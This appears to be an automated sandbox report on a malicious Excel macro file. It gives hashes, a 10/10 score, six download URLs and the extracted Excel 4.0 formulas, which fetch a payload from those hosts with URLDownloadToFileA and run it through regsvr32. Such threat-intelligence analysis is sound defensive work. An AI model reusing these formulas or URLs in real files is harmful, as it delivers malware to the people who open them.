Overview

overview

10

Static

static

10

248e9ed194...b.xlsm

windows7-x64

10

248e9ed194...b.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    248e9ed1945f6e65ec72d7fe9dafd52b396bfc5fa9636f447d25d70f37fde3db

  • Size

    46KB

  • Sample

    241120-lhe2aavblb

  • MD5

    495f82201689fcdaf8d0e81de8ddb8c6

  • SHA1

    c7a18e8bf904b31d14fcdaba5880c9a10790971c

  • SHA256

    248e9ed1945f6e65ec72d7fe9dafd52b396bfc5fa9636f447d25d70f37fde3db

  • SHA512

    0dbd2a569b7839114da9dac8df2d8fd3dba36bffcfd4163acedc6062008ae788688b2ea0aa1e9f9fc123bb34d5213a9e7991261df1be76af46ccd693057675d5

  • SSDEEP

    768:cdolODOevZCwrvtMezdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VfNN/u:aoIDHtT5fTR4Lh1NisFYBc3cr+UqVfNw

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://gymsportive.com/0zwe/pSiUh/

http://danialteb.com/wp-admin/NqRYgwPERRPoTs/

http://totalplaytuxtla.com/sitio/IduhreKcPbD/

http://skanev.com/wp-content/AT5Doj207guJES0BMk/

http://praachichemfood.com/old-files==-/vo68ZI/

http://curtistreeclimbing.com/css/2oFtx1t5P8qcVKnCl/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gymsportive.com/0zwe/pSiUh/","..\sei.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://danialteb.com/wp-admin/NqRYgwPERRPoTs/","..\sei.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://totalplaytuxtla.com/sitio/IduhreKcPbD/","..\sei.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://skanev.com/wp-content/AT5Doj207guJES0BMk/","..\sei.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://praachichemfood.com/old-files==-/vo68ZI/","..\sei.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://curtistreeclimbing.com/css/2oFtx1t5P8qcVKnCl/","..\sei.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://gymsportive.com/0zwe/pSiUh/
xlm40.dropper

http://danialteb.com/wp-admin/NqRYgwPERRPoTs/
xlm40.dropper

http://totalplaytuxtla.com/sitio/IduhreKcPbD/
xlm40.dropper

http://skanev.com/wp-content/AT5Doj207guJES0BMk/
xlm40.dropper

http://praachichemfood.com/old-files==-/vo68ZI/

Targets

    • Target

      248e9ed1945f6e65ec72d7fe9dafd52b396bfc5fa9636f447d25d70f37fde3db

    • Size

      46KB

    • MD5

      495f82201689fcdaf8d0e81de8ddb8c6

    • SHA1

      c7a18e8bf904b31d14fcdaba5880c9a10790971c

    • SHA256

      248e9ed1945f6e65ec72d7fe9dafd52b396bfc5fa9636f447d25d70f37fde3db

    • SHA512

      0dbd2a569b7839114da9dac8df2d8fd3dba36bffcfd4163acedc6062008ae788688b2ea0aa1e9f9fc123bb34d5213a9e7991261df1be76af46ccd693057675d5

    • SSDEEP

      768:cdolODOevZCwrvtMezdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VfNN/u:aoIDHtT5fTR4Lh1NisFYBc3cr+UqVfNw

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks